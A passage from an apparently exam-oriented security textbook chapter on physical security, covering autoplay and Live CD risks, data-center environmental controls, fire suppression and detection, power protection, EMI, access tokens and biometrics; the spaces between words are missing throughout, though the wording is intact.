theautoplayfeaturethatsomeoperatingsystemssupport.Autoplaywasdesignedasaconvenienceforusers,sothatwhenaCD/DVDorUSBcontaininganapplicationisinserted,thecomputerinstantlypromptsforinputversusrequiringtheusertoexplorethedevicefilesystemandfindtheexecutablefile.Unfortunately,sincetheautoplayfunctionalityrunsanexecutable,itcanbeprogrammedtodoanythinganattackerwants.Ifanautoplayexecutableismalicious,itcouldallowanattackertogainremotecontrolofthemachine.Figure8.8illustratesanautoplaymessagepromptinWindows,givingauseratleastminimalcontroloverwhethertorunanitemornot.
•Figure8.8AutoplayonaWindowssystem
Sincetheopticaldrivecanbeusedasabootdevice,aDVDloadedwith
itsownoperatingsystem(calledaLiveCD,introducedearlierinthechapter)couldbeusedtobootthecomputerwithmalicioussystemcode(seeFigure8.9).Thisseparateoperatingsystemwillbypassanypasswordsonthehostmachineandcanaccesslocallystoredfiles.
•Figure8.9ALiveCDbootsitsownOSandbypassesanybuilt-insecurityofthenativeoperatingsystem.
TechTip
DisablingtheAutoplayFeatureinWindowsDisablingtheautoplayfeatureisaneasytaskusingLocalGroupPolicyEditorinWindows.SimplylaunchtheLocalGroupPolicyEditor(gpedit.msc)andnavigatetothislocation:
ComputerConfiguration>AdministrativeTemplates>WindowsComponents>AutoPlayPolicies
DeviceTheftTheoutrighttheftofacomputerisasimplephysicalattack.Thisattackcanbemitigatedinanumberofways,butthemosteffectivemethodistolockupequipmentthatcontainsimportantdata.Insurancecancoverthelossofthephysicalequipment,butthiscandolittletogetabusinessupandrunningagainquicklyafteratheft.Therefore,implementingspecialaccesscontrolsforserverroomsandsimplylockingtherackcabinetswhenmaintenanceisnotbeingperformedaregoodwaystosecureanarea.Fromadatastandpoint,mission-criticalorhigh-valueinformationshouldbestoredonaserveronly.Thiscanmitigatetheriskofadesktoporlaptopbeingstolenforthedataitcontains.Lossoflaptopshasbeenacommoncauseofinformationbreaches.
Mobiledevicetheftsfromcarsandotherlocationscanoccurinseconds.Thieveshavebeencaughttakingmobiledevicesfromsecurityscreeningareasatairportswhiletheownerwasdistractedinscreening.Snatchandgrabattacksoccurinrestaurants,bars,andcafes.Tabletsandsmartphoneshavesignificantvalueandphysicalprecautionsshouldbetakenatalltimes.
CrossCheckMobileDeviceSecurityMobiledevicesecurityiscoveredindepthinChapter14.Foramoredetailedanalysisofsafeguardsuniquetomobiledevices,pleaserefertothatsectionofthetext.
Userscanperformoneofthemostsimple,yetimportant,informationsecuritytasks:lockaworkstationimmediatelybeforetheystepawayfromit.
Althoughuseofaself-lockingscreensaverisagoodpolicy,settingittolockatanypointlessthan10to15minutesafterbecomingidleisoftenconsideredanuisanceandcounterproductivetoactiveuseofthecomputeronthejobasthecomputerwilloftenlockwhiletheemployeeisstillactivelyusingthecomputer.Thus,computerstypicallysitidleforatleast15minutesbeforeautomaticallylockingunderthistypeofpolicy.Usersshouldmanuallylocktheirworkstations,asanattackeronlyneedstobeluckyenoughtocatchamachinethathasbeenleftalonefor5minutes.
BTUstandsforBritishThermalUnit;asingleBTUisdefinedastheamountofenergyrequiredtoraisethetemperatureofonepoundofliquidwateronedegreeFahrenheit.
EnvironmentalControlsWhiletheconfidentialityofinformationisimportant,soisitsavailability.Sophisticatedenvironmentalcontrolsareneededforcurrentdatacenters.Serverscangeneratelargelevelsofheat,andmanagingtheheatisthejoboftheenvironmentalcontrol.Controllingadatacenter’stemperatureandhumidityisimportantto
keepingserversrunning.Heatingventilatingandairconditioning(HVAC)systemsarecriticalforkeepingdatacenterscool,becausetypicalserversputoutbetween1000and2000BTUsofheat.Thetemperatureofadatacentershouldbemaintainedbetween70and74degreesFahrenheit(°F).Ifthetemperatureistoolow,itmaycausemechanismstoslowdown.Ifthetemperatureistoohigh,itmaycauseequipmentdamage.Thetemperature-damagingpointsofdifferentproductsareasfollows:
Magneticmedia:100°F
Computerhardware:175°F
Paperproducts:350°F
Itshouldbenotedthatthesearetemperaturesofthematerials;thesurroundingairisfrequentlycooler.Temperaturemeasurementsshouldbeobtainedonequipmentitselftoensureappropriateprotection.Multipleserversinaconfinedareacancreateconditionstoohotforthe
machinestocontinuetooperate.Thisproblemismadeworsewiththeadventofblade-stylecomputingsystemsandwithmanyotherdevicesshrinkinginsize.Whilephysicallysmaller,theytendtostillexpelthesameamountofheat.Thisisknownasincreaseddatacenterdensity—moreserversanddevicesperrack,puttingagreaterloadonthecoolingsystems.Thisencouragestheuseofahotaisle/coldaislelayout.Adatacenterthatisarrangedintohotandcoldaislesdictatesthatalltheintakefansonallequipmentfacethecoldaisle,andtheexhaustfansallfacetheoppositeaisle.TheHVACsystemisthendesignedtopushcoolairunderneaththeraisedfloorandupthroughperforatedtilesonthecoldaisle.HotairfromthehotaisleiscapturedbyreturnairductsfortheHVACsystem.Theuseofthislayoutisdesignedtocontrolairflow,withthepurposebeingnevertomixthehotandcoldair.Thisrequirestheuseofblockingplatesandsideplatestocloseopenrackslots.Thebenefitsofthisarrangementarethatcoolingismoreefficientandcanhandlehigherdensity.ThefailureofHVACsystemsforanyreasoniscauseforconcern.RisingcopperpriceshavemadeHVACsystemsthetargetsforthieves,andgeneralvandalismcanresultincostlydowntime.ProperlysecuringthesesystemsisimportantinhelpingpreventanattackerfromperformingaphysicalDoSattackonyourservers.
FireSuppressionAccordingtotheFireSuppressionSystemsAssociation(www.fssa.net),43percentofbusinessesthatcloseasaresultofasignificantfireneverreopen.Anadditional29percentfailwithinthreeyearsoftheevent.Theabilitytorespondtoafirequicklyandeffectivelyisthuscriticaltothelong-termsuccessofanyorganization.Addressingpotentialfirehazardsandvulnerabilitieshaslongbeenaconcernoforganizationsintheirrisk
analysisprocess.Thegoalobviouslyshouldbenevertohaveafire,butintheeventthatonedoesoccur,itisimportantthatmechanismsareinplacetolimitthedamagethefirecancause.
TechTip
EnvironmentandFiresWhileitmayatfirstseemtothesecurityprofessionalthatenvironmentalcontrolsandnaturaldisasterssuchasfiresdon’thaveanythingtodowithcomputersecurity,thinkofitintermsofavailability.Ifthegoaloftheattackerisnotinformationbutrathertodenyanorganizationtheuseofitsresources,environmentalfactors,anddisasterssuchasfires,canbeusedtodenythetargettheuseofitsowncomputingresources.This,then,becomesasecurityissueaswellasanoperationalissue.
Water-BasedFireSuppressionSystemsWater-basedfiresuppressionsystemshavelongbeen,andstillaretoday,theprimarytooltoaddressandcontrolstructuralfires.Consideringtheamountofelectricalequipmentfoundintoday’sofficeenvironmentandthefactthat,forobviousreasons,thisequipmentdoesnotreactwelltolargeapplicationsofwater,itisimportanttoknowwhattodowithequipmentifitdoesbecomesubjectedtoawater-basedsprinklersystem.TheNationalFireProtectionAssociation’s2013NFPA75:StandardfortheProtectionofInformationTechnologyEquipmentoutlinesmeasuresthatcanbetakentominimizethedamagetoelectronicequipmentexposedtowater.Thisguidanceincludesthesesuggestions:
Opencabinetdoors,removesidepanelsandcovers,andpulloutchassisdrawerstoallowwatertorunoutofequipment.
Setupfanstomoveroom-temperatureairthroughtheequipmentforgeneraldrying.Moveportableequipmenttodryair-conditionedareas.
Usecompressedairatnohigherthan50psitoblowouttrappedwater.
Usehandhelddryersonlowestsettingtodryconnectors,backplanewirewraps,andprintedcircuitcards.
Usecotton-tippedswabsforhard-to-reachplaces.Lightlydabthesurfacestoremoveresidualmoisture.
Keepthedryerswellawayfromcomponentsandwires.Overheatingofelectricalcomponentscancausepermanentdamage.
Eveniftheseguidelinesarefollowed,damagetothesystemsmayhavealreadyoccurred.Sincewaterissodestructivetoelectronicequipment,notonlybecauseoftheimmediateproblemsofelectronicshortstothesystembutalsobecauseoflonger-termcorrosivedamagewatercancause,alternativefiresuppressionmethodshavebeensought.
Halon-BasedFireSuppressionSystemsAfireneedsfuel,oxygen,andhightemperaturesforthechemicalcombustiontooccur.Ifyouremoveanyofthese,thefirewillnotcontinue.Haloninterfereswiththechemicalcombustionpresentinafire.Eventhoughhalonproductionwasbannedin1994,anumberofthesesystemsstillexisttoday.Theywereoriginallypopularbecausehalonwillmixquicklywiththeairinaroomandwillnotcauseharmtocomputersystems.Halonis,however,dangeroustohumans,especiallywhensubjectedtoextremelyhottemperatures(suchasmightbefoundduringafire),whenitcandegradeintoothertoxicchemicals.Asaresultofthesedangers,andalsobecausehalonhasbeenlinkedwiththeissueofozonedepletion,halonisbannedinnewfiresuppressionsystems.ItisimportanttonotethatundertheEnvironmentalProtectionAgency(EPA)rulesthatmandatednofurtherproductionofhalon,existingsystemswerenotrequiredtobedestroyed.Replacingthehaloninadischargedsystem,
however,willbeaproblem,sinceonlyexistingstockpilesofhalonmaybeusedandthecostisbecomingprohibitive.Forthisreason,manyorganizationsareswitchingtoalternativesolutions.
TechTip
DrillsIntheeventofanemergency,peoplewillbechallengedtoperformcorrectactionswhenstressedbytheemergency.Theuseofdrills,plans,andtestingwillensurethatescapeplansandescaperoutesareknownandeffectiveandthatpeoplearefamiliarwiththeiruse.Thetimetopracticeisbeforetheproblem,andrepeatingpracticeovertimebuildsconfidenceandstrengthensfamiliarity.
Clean-AgentFireSuppressionSystemsThesealternativesareknownasclean-agentfiresuppressionsystems,sincetheynotonlyprovidefiresuppressioncapabilitiesbutalsoprotectthecontentsoftheroom,includingpeople,documents,andelectronicequipment.Examplesofcleanagentsincludecarbondioxide,argon,Inergen,andFM-200(heptafluoropropane).Carbondioxide(CO2)hasbeenusedasafiresuppressionagentforalongtime.TheBellTelephoneCompanyusedportableCO2extinguishersintheearlypartofthe20thcentury.Carbondioxideextinguishersattackallthreenecessaryelementsforafiretooccur.CO2displacesoxygensothattheamountofoxygenremainingisinsufficienttosustainthefire.Italsoprovidessomecoolinginthefirezoneandreducestheconcentrationof“gasified”fuel.Argonextinguishesfirebyloweringtheoxygenconcentrationbelowthe15percentlevelrequiredforcombustibleitemstoburn.Argonsystemsaredesignedtoreducetheoxygencontenttoabout12.5percent,whichisbelowthe15percentneededforthefirebutisstillabovethe10percentrequiredbytheEPAforhumansafety.Inergen,aproductofAnsulCorporation,iscomposedofthreegases:52percentnitrogen,40percent
argon,and8percentcarbondioxide.Inamannersimilartopureargonsystems,Inergensystemsreducethelevelofoxygentoabout12.5percent,whichissufficientforhumansafetybutnotsufficienttosustainafire.Anotherchemicalusedinthephase-outofhalonisFE-13,ortrifluoromethane.Thischemicalwasoriginallydevelopedasachemicalrefrigerantandworkstosuppressfiresbyinhibitingthecombustionchainreaction.FE-13isgaseous,leavesbehindnoresiduethatwouldharmequipment,andisconsideredsafetouseinoccupiedareas.Otherhalocarbonsarealsoapprovedforuseinreplacinghalonsystems,includingFM-200(heptafluoropropane),achemicalusedasapropellantforasthmamedicationdispensers.
HandheldFireExtinguishersAutomaticfiresuppressionsystemsdesignedtodischargewhenafireisdetectedarenottheonlysystemsyoushouldbeawareof.Ifafirecanbecaughtandcontainedbeforetheautomaticsystemsdischarge,itcanmeansignificantsavingstotheorganizationintermsofbothtimeandequipmentcosts(includingtherechargingoftheautomaticsystem).Handheldextinguishersarecommoninoffices,butthecorrectuseofthemmustbeunderstoodordisastercanoccur.Therearefourdifferenttypesoffire,asshowninTable8.1.Eachtypeoffirehasitsownfuelsourceandmethodforextinguishingit.TypeAsystems,forexample,aredesignedtoextinguishfireswithnormalcombustiblematerialasthefire’ssource.Watercanbeusedinanextinguisherofthissort,sinceitiseffectiveagainstfiresofthistype.Water,aswe’vediscussed,isnotappropriateforfiresinvolvingwiringorelectricalequipment.UsingatypeAextinguisheragainstanelectricalfirewillnotonlybeineffectivebutcanresultinadditionaldamage.Someextinguishersaredesignedtobeeffectiveagainstmorethanonetypeoffire,suchasthecommonABCfireextinguishers.Thisisprobablythebesttypeofsystemtohaveinadataprocessingfacility.Allfireextinguishersshouldbeeasilyaccessibleandshouldbeclearlymarked.Beforeanybodyusesanextinguisher,theyshouldknow
whattypeofextinguisheritisandwhatthesourceofthefireis.Whenindoubt,evacuateandletthefiredepartmenthandlethesituation.
Table8.1 TypesofFireandSuppressionMethods
ExamTip:Thetypeoffiredistinguishesthetypeofextinguisherthatshouldbeusedtosuppressit.RememberthatthemostcommontypeistheABCfireextinguisher,whichisdesignedtohandlealltypesoffiresexceptflammable-metalfires,whicharerare.
TryThis!HandheldFireExtinguishersComputersecurityprofessionalstypicallydonothavemuchinfluenceoverthetypeoffiresuppressionsystemthattheirofficeincludes.Itis,however,importantthattheyareawareofwhattypehasbeeninstalled,whattheyshoulddoincaseofanemergency,andwhatneedstobedonetorecoverafterthereleaseofthesystem.Oneareathattheycaninfluence,however,isthetypeofhandheldfireextinguisherthatislocatedintheirarea.Checkyourfacilitytoseewhattypeoffiresuppressionsystemisinstalled.Alsochecktoseewherethefireextinguishersareinyourofficeandwhattypeoffirestheyaredesignedtohandle.
FireDetectionDevicesAnessentialcomplementtofiresuppressionsystemsanddevicesarefiredetectiondevices(firedetectors).Detectorsmaybeabletodetectafireinitsveryearlystages,beforeafiresuppressionsystemisactivated,andsoundawarningthatpotentiallyenablesemployeestoaddressthefirebeforeitbecomesseriousenoughforthefiresuppressionequipmenttokickin.Thereareseveraldifferenttypesoffiredetectors.Onetype,ofwhich
therearetwovarieties,isactivatedbysmoke.Thetwovarietiesofsmokedetectorareionizationandphotoelectric.Aphotoelectricdetectorisgoodforpotentiallyprovidingadvancewarningofasmolderingfire.Thistypeofdevicemonitorsaninternalbeamoflight.Ifsomethingdegradesthelight,forexamplebyobstructingit,thedetectorassumesitissomethinglikesmokeandthealarmsounds.Anionizationstyleofdetectorusesanionizationchamberandasmallradioactivesourcetodetectfast-burningfires.ShowninFigure8.10,thechamberconsistsoftwoplates,onewithapositivechargeandonewithanegativecharge.Oxygenandnitrogenparticlesintheairbecome“ionized”(anionisfreedfromthemolecule).Thefreedion,whichhasanegativecharge,isattractedtothepositiveplate,andtheremainingpartofthemolecule,nowwithapositivecharge,isattractedtothenegativeplate.Thismovementofparticlescreatesaverysmallelectriccurrentthatthedevicemeasures.Smokeinhibitsthisprocess,andthedetectorwilldetecttheresultingdropincurrentandsoundanalarm.Bothofthesedevicesareoftenreferredtogenericallyassmokedetectors,andcombinationsofbothvarietiesarepossible.Formoreinformationonsmokedetectors,seehttp://home.howstuffworks.com/home-improvement/household-safety/fire/smoke2.htm.
•Figure8.10Anionizationchamberforanionizationtypeofsmokedetector
TechTip
TestingControlsBecauseoftheimportanceoftheirprotection,safetycontrolsshouldbeperiodicallytestedforproperoperationandalerting.Thisshouldbeasystem-level,notdevice-level,testtoensuretheentirecontrolsystemperformsintheintendedmanner.
Anothertypeoffiredetectorisactivatedbyheat.Thesedevicesalsocomeintwovarieties.Fixed-temperatureorfixed-pointdevicesactivateifthetemperatureintheareaeverexceedssomepredefinedlevel.Rate-of-riseorrate-of-increasetemperaturedevicesactivatewhenthereisasuddenincreaseinlocaltemperaturethatmayindicatethebeginningstagesofafire.Rate-of-risesensorscanprovideanearlierwarningbutarealsoresponsibleformorefalsewarnings.Athirdtypeofdetectorisflameactivated.Thistypeofdevicerelieson
theflamesfromthefiretoprovideachangeintheinfraredenergythatcan
bedetected.Flame-activateddevicesaregenerallymoreexpensivethantheothertwotypesbutcanfrequentlydetectafiresooner.
PowerProtectionComputersystemsrequirecleanelectricalpower,andforcriticalsystems,uninterruptedpowercanbeimportantaswell.Thereareseveralelementsusedtomanagethepowertosystems,includinguninterruptiblepowersuppliesandbackuppowersystems.
TechTip
UPSAttributesUPSsystemshaveseveralattributestoconsider:
Theelectricalloadtheycansupport(measuredinkVA)
ThelengthoftimetheycansupporttheloadThespeedofprovidingpowerwhenthereisapowerfailure
Thephysicalspacetheyoccupy
UPSAnuninterruptiblepowersupply(UPS)isusedtoprotectagainstshort-durationpowerfailures.TherearetwotypesofUPS,onlineandstandby.AnonlineUPSisincontinuoususebecausetheprimarypowersourcegoesthroughittotheequipment.ItusesAClinevoltagetochargeabankofbatteries.Whentheprimarypowersourcefails,aninverterintheUPSwillchangeDCofthebatteriesintoAC.AstandbyUPShassensorstodetectpowerfailures.Ifthereisapowerfailure,theloadwillbeswitchedtotheUPS.Itstaysinactivebeforeapowerfailure,andtakesmoretimethananonlineUPStoprovidepowerwhentheprimarysourcefails.
BackupPowerandCableShieldingBackuppowersources,suchasamotorgenerator,anotherelectricalsubstation,andsoon,areusedtoprotectagainstalong-durationpowerfailure.Avoltageregulatorandlineconditionerareusedtoprotectagainstunstablepowersupplyandspikes.Propergroundingisessentialforallelectricaldevicestoprotectagainstshortcircuitsandstaticelectricity.Inmoresensitiveareas,cableshieldingcanbeemployedtoavoid
interference.Powerlinemonitoringcanbeusedtodetectchangesinfrequencyandvoltageamplitude,warningofbrownoutsorspikes.Anemergencypoweroff(EPO)switchcanbeinstalledtoallowforthequickshutdownofpowerwhenrequired.Topreventelectromagneticinterferenceandvoltagespikes,electricalcablesshouldbeplacedawayfrompowerfulelectricalmotorsandlighting.Anothersourceofpower-inducedinterferencecanbefluorescentlighting,whichcancauseradiofrequencyinterference.
ElectromagneticInterferenceElectromagneticinterference,orEMI,canplagueanytypeofelectronics,butthedensityofcircuitryinthetypicaldatacentercanmakeitahavenforEMI.EMIisdefinedasthedisturbanceonanelectricalcircuitcausedbythatcircuit’sreceptionofelectromagneticradiation.Magneticradiationentersthecircuitbyinduction,wheremagneticwavescreateachargeonthecircuit.Theamountofsensitivitytothismagneticfielddependsonanumberoffactors,includingthelengthofthecircuit,whichcanactlikeanantenna.EMIisgroupedintotwogeneraltypes:narrowbandandbroadband.NarrowbandEMIis,byitsnature,electromagneticenergywithasmallfrequencybandand,therefore,typicallysourcedfromadevicethatispurposefullytransmittinginthespecifiedband.BroadbandEMIcoversawiderarrayoffrequenciesandistypicallycausedbysometypeofgeneralelectricalpowerusesuchaspowerlinesorelectricmotors.IntheUnitedStates,theFederalCommunicationsCommissionhas
responsibilityforregulatingproductsthatproduceEMIandhasdevelopedaprogramforequipmentmanufacturerstoadheretostandardsforEMIimmunity.ModerncircuitryisdesignedtoresistEMI.Cablingisagoodexample;thetwistinunshieldedtwistedpair,orCategory6/6a,cableistheretoreduceEMI.EMIisalsocontrolledbymetalcomputercasesthataregrounded;byprovidinganeasypathtoground,thecaseactsasanEMIshield.AbiggerexamplewouldbeaFaradaycageorFaradayshield,whichisanenclosureofconductivematerialthatisgrounded.Thesecanberoomsizedorbuiltintoabuilding’sconstruction;thecriticalelementisthatthereisnosignificantgapintheenclosurematerial.ThesemeasurescanhelpshieldEMI,especiallyinhighradiofrequencyenvironments.WhilewehavetalkedabouttheshieldingnecessarytokeepEMI
radiationoutofyourcircuitry,thereisalsotechnologytotryandhelpkeepitin.KnownbysomeasTEMPEST,itisalsoknownasVanEckemissions.Acomputer’smonitororLCDdisplayproduceselectromagneticradiationthatcanberemotelyobservedwiththecorrectequipment.TEMPESTwasthecodewordforanNSAprogramtosecureequipmentfromthistypeofeavesdropping.WhilesomeoftheinformationaboutTEMPESTisstillclassified,thereareguidesontheInternetthatdescribeprotectivemeasures,suchasshieldingandelectromagnetic-resistantenclosures.Acompanyhasevendevelopedacommercialpaintthatoffersradiofrequencyshielding.
TechTip
MasterKeysMechanicalkeyingsystemswithindustrial-gradelockshaveprovisionsformultiplemasterkeys.Thisallowsindividualmasterkeystobedesignatedbyfloor,bydepartment,bythewholebuilding,andsoforth.Thisprovidestremendousflexibility,althoughifamasterkeyislost,significantrekeyingwillberequired.
ElectronicAccessControlSystemsAccesstokensaredefinedas“somethingyouhave.”Anaccesstokenisaphysicalobjectthatidentifiesspecificaccessrights.Accesstokensarefrequentlyusedforphysicalaccesssolutions,justasyourhousekeyisabasicphysicalaccesstokenthatallowsyouaccessintoyourhome.Althoughkeyshavebeenusedtounlockdevicesforcenturies,theydohaveseverallimitations.Keysarepairedexclusivelywithalockorasetoflocks,andtheyarenoteasilychanged.Itiseasytoaddanauthorizeduserbygivingtheuseracopyofthekey,butitisfarmoredifficulttogivethatuserselectiveaccessunlessthatspecifiedareaisalreadysetupasaseparatekey.Itisalsodifficulttotakeaccessawayfromasinglekeyorkeyholder,whichusuallyrequiresarekeyofthewholesystem.Inmanybusinesses,physicalaccessauthenticationhasmovedto
contactlessradiofrequencycardsandproximityreaders.Whenpassednearacardreader,thecardsendsoutacodeusingradiowaves.Thereaderpicksupthiscodeandtransmitsittothecontrolpanel.Thecontrolpanelchecksthecodeagainstthereaderfromwhichitisbeingreadandthetypeofaccessthecardhasinitsdatabase.Oneoftheadvantagesofthiskindoftoken-basedsystemisthatanycardcanbedeletedfromthesystemwithoutaffectinganyothercardortherestofthesystem.TheRFID-basedcontactlessentrycardshowninFigure8.11isacommonformofthistokendeviceemployedfordoorcontrolsandisfrequentlyputbehindanemployeebadge.Inaddition,alldoorsconnectedtothesystemcanbesegmentedinanyformorfashiontocreatemultipleaccessareas,withdifferentpermissionsforeachone.Thetokensthemselvescanalsobegroupedinmultiplewaystoprovidedifferentaccesslevelstodifferentgroupsofpeople.Alloftheaccesslevelsorsegmentationofdoorscanbemodifiedquicklyandeasilyifbuildingspaceisretasked.Newertechnologiesareaddingcapabilitiestothestandardtoken-basedsystems.
•Figure8.11Smartcardshaveaninternalchipaswellasmultipleexternalcontactsforinterfacingwithasmartcardreader.
Theadventofsmartcards(cardsthatcontainintegratedcircuitscapableofgeneratingandstoringcryptographickeys)hasenabledcryptographictypesofauthentication.Smartcardtechnologyhasprovenreliableenoughthatitisnowpartofagovernmentalstandardforphysicalandlogicalauthentication.KnownasPersonalIdentityVerification,orPIV,cards,theyadheretotheFIPS201standard.Thissmartcardincludesacryptographicchipandconnector,aswellasacontactlessproximitycardcircuit.Italsohasstandardsforaprintedphotoandnameprintingonthefront.Biometricdatacanbestoredonthecard,providinganadditionalauthenticationfactor,andifthePIVstandardisfollowed,severalformsof
identificationareneededtogetacard.
TechTip
PersonnelIDBadgesHavingpersonnelwearavisibleIDbadgewiththeirpictureisacommonformofphysicalsecurity.Ifeveryoneissupposedtowearabadgevisibly,thenanyonewhoseessomeonewithoutabadgecanaskthemwhotheyare,andwhytheyarethere.Thisgreatlyincreasesthenumberofeyeswatchingforintrudersinlarge,publiclyaccessiblefacilities.
Theprimarydrawbackoftoken-basedauthenticationisthatonlythetokenisbeingauthenticated.Therefore,thetheftofthetokencouldgrantanyonewhopossessedthetokenaccesstowhatthesystemprotects.Theriskoftheftofthetokencanbeoffsetbytheuseofmultiple-factorauthentication.Oneofthewaysthatpeoplehavetriedtoachievemultiple-factorauthenticationistoaddabiometricfactortothesystem.
AccessTokensElectronicaccesscontrolsystemswerespawnedfromtheneedtohavemoreloggingandcontrolthanprovidedbytheoldermethodofmetallickeys.Mostelectronicsystemscurrentlyuseatoken-basedcardthatifpassednearareaderwillunlockthedoorstrikeandletyoupassintothearea(assumingyouhavepermissionfromthesystem).Newertechnologyattemptstomaketheauthenticationprocesseasierandmoresecure.Thefollowingsectionsdiscusshowtokensandbiometricsarebeing
usedforauthentication.Italsolooksintohowmultiple-factorauthenticationcanbeusedforphysicalaccess.
BiometricsBiometricsusethemeasurementsofcertainbiologicalfactorstoidentifyonespecificpersonfromothers.Thesefactorsarebasedonpartsofthe
humanbodythatareunique.Themostwellknownoftheseuniquebiologicalfactorsisthefingerprint.Fingerprintreadershavebeenavailableforseveralyearsinlaptops.Thesecomeinavarietyofformfactors,suchastheexampleshowninFigure8.12,andasstandaloneUSBdevices.
•Figure8.12Newerlaptopcomputersoftenincludeafingerprintreader.
However,manyotherbiologicalfactorscanbeused,suchastheretinaoririsoftheeye,thegeometryofthehand,andthegeometryoftheface.Whentheseareusedforauthentication,thereisatwo-partprocess:enrollmentandthenauthentication.Duringenrollment,acomputertakestheimageofthebiologicalfactorandreducesittoanumericvalue.Whentheuserattemptstoauthenticate,theirfeatureisscannedbythereader,andthecomputercomparesthenumericvaluebeingreadtotheonestoredinthedatabase.Iftheymatch,accessisallowed.Sincethesephysicalfactorsareunique,theoreticallyonlytheactualauthorizedpersonwouldbe
allowedaccess.Intherealworld,however,thetheorybehindbiometricsbreaksdown.
Tokensthathaveadigitalcodeworkverywellbecauseeverythingremainsinthedigitalrealm.Acomputerchecksyourcode,suchas123,againstthedatabase;ifthecomputerfinds123andthatnumberhasaccess,thecomputeropensthedoor.Biometrics,however,takeananalogsignal,suchasafingerprintoraface,andattempttodigitizeit,anditisthenmatchedagainstthedigitsinthedatabase.Theproblemwithananalogsignalisthatitmightnotencodetheexactsamewaytwice.Forexample,ifyoucametoworkwithabandageonyourchin,wouldtheface-basedbiometricsgrantyouaccessordenyit?Engineerswhodesignedthesesystemsunderstoodthatifasystemwas
settoexactchecking,anencodedbiometricmightnevergrantaccesssinceitmightneverscanthebiometricexactlythesamewaytwice.Therefore,mostsystemshavetriedtoallowacertainamountoferrorinthescan,whilenotallowingtoomuch.Thisleadstotheconceptsoffalsepositivesandfalsenegatives.Afalsepositiveoccurswhenabiometricisscannedandallowsaccesstosomeonewhoisnotauthorized—forexample,twopeoplewhohaveverysimilarfingerprintsmightberecognizedasthesamepersonbythecomputer,whichgrantsaccesstothewrongperson.Afalsenegativeoccurswhenthesystemdeniesaccesstosomeonewhoisactuallyauthorized—forexample,auseratthehandgeometryscannerforgottoweararingheusuallywearsandthecomputerdoesn’trecognizehishandanddenieshimaccess.Forbiometricauthenticationtoworkproperly,andalsobetrusted,itmustminimizetheexistenceofbothfalsepositivesandfalsenegatives.Todothat,abalancebetweenexactinganderrormustbecreatedsothatthemachinesallowalittlephysicalvariance—butnottoomuch.
FalsePositivesandFalseNegativesWhenadecisionismadeoninformationandanassociatedrangeofprobabilities,theconditionsexistforafalsedecision.Figure8.13illustratestwooverlappingprobabilities;anitembelongstoeithertheredcurveorthebluecurve,butnotboth.The
problemindecidingwhichcurveanitembelongstooccurswhenthecurvesoverlap.
•Figure8.13Overlappingprobabilities
Whenthereisanoverlappingarea,itistypicallyreferredtoasthefalsepositiveandfalsenegativerate.Notethatintheaccompanyingfigures,thesizeofoverlapisgreatlyexaggeratedtomakeiteasytosee.Figure8.14illustratesafalsepositivedetection.Ifthevalueobservedisthedottedline,thenitcouldbeconsideredeitheramatchoranon-match.Ifinfactitshouldnotmatch,andthesystemtagsitasamatch,itisafalsepositive.Inbiometrics,afalsepositivewouldallowaccesstoanunauthorizedparty.
•Figure8.14Falsepositive
Figure8.15illustratesafalsenegativedetection.Ifthevalueobservedisthedottedline,thenitcouldbeconsideredeitheramatchoranon-match.Ifinfactitshouldmatch,andthesystemtagsitasanon-match,itisafalsenegative.Afalsenegativewouldpreventanauthorizeduserfromobtainingaccess.
•Figure8.15Falsenegative
ExamTip:Falsepositiveandfalsenegativearefrequentlyconfused.Thetruedefinitionsrevolvearoundthestatisticaltermnullhypothesis.Forauthentication,itisassumedthatthepersonisnotauthorized.Ifthepersonisnotauthorized,andthetestincorrectlyrejectsthenullhypothesisandallowsentry,thisisafalsepositive—alsocalledaTypeIerror.Ifthepersonisauthorized,andthetestfailstoallowentry,thenthisisafalsenegative,orTypeIIerror.Theimportantelementisthedirectionofthenullhypothesis,which,forauthentication,wouldbetodenyentry.
Tosolvethefalsepositiveandfalsenegativeissue,theprobabilisticenginemustproducetwosetsofcurvesthatdonotoverlap.Thisisequivalenttoverylow,<0.001%,falsepositiveandfalsenegativerates.Becausethecurvestechnicallyhavetailsthatgoforever,therewillalwaysbesomefalserates,butthenumbershavetobeexceedinglysmalltoassuresecurity.Figure8.16illustratesthedesired,buttypicallyimpractical,separationofthecurves.
•Figure8.16Desiredsituation
Amorerealisticsituationhasthetwocurvescrossingoveratsomepoint,andthispointisknownasthecrossovererrorrate(CER).TheCERisthepointwherethefalseacceptanceandfalserejectionratesareequal.Whileasystemhastheabilitytoadjustwhichofthetwofalseratestofavor,theCERprovidesameansofcomparingsystemsperformanceatdiscriminatingsignals.AsystemwithaCERof2percentismoreaccurate(andhasmoreseparation)thanonewithaCERof5percent.Anotherconcernwithbiometricsisthatifsomeoneisabletostealthe
uniquenessfactorthatthemachinescans—yourfingerprintfromaglass,forexample—andisabletoreproducethatfactorinasubstancethatfoolsthescanner,thatpersonnowhasyouraccessprivileges.Thisideaiscompoundedbythefactthatitisimpossibleforyoutochangeyourfingerprintifitgetsstolen.Itiseasytoreplacealostorstolentokenanddeletethemissingonefromthesystem,butitisfarmoredifficulttoreplaceahumanhand.Anotherproblemwithbiometricsisthatpartsofthehumanbodycanchange.Ahumanfacecanchange,throughscarring,weightlossorgain,orsurgery.Afingerprintcanbechangedthroughdamagetothefingers.Eyeretinascanbeaffectedbysometypesofdiabetesorbypregnancy.Allofthesechangesforcethebiometricsystem
toallowahighertoleranceforvarianceinthebiometricbeingread.Thishasledthewayforhigh-securityinstallationstomovetowardmultiple-factorauthentication.
Multiple-FactorAuthenticationMultiple-factorauthenticationissimplythecombinationoftwoormoretypesofauthentication.Threebroadcategoriesofauthenticationcanbeused:whatyouare(forexample,biometrics),whatyouhave(forinstance,tokens),andwhatyouknow(passwordsandotherinformation).Two-factorauthenticationcombinesanytwoofthesebeforegrantingaccess.Anexamplewouldbeacardreaderthatthenturnsonafingerprintscanner—ifyourfingerprintmatchestheoneonfileforthecard,youaregrantedaccess.Three-factorauthenticationwouldcombineallthreetypes,suchasasmartcardreaderthatasksforaPINbeforeenablingaretinascanner.Ifallthreecorrespondtoavaliduserinthecomputerdatabase,accessisgranted.
ExamTip:Two-factorauthenticationcombinesanytwomethodsofauthentication,matchingitemssuchasatokenwithabiometric.Three-factorauthenticationcombinesanythree,suchasapasscode,biometric,andatoken.
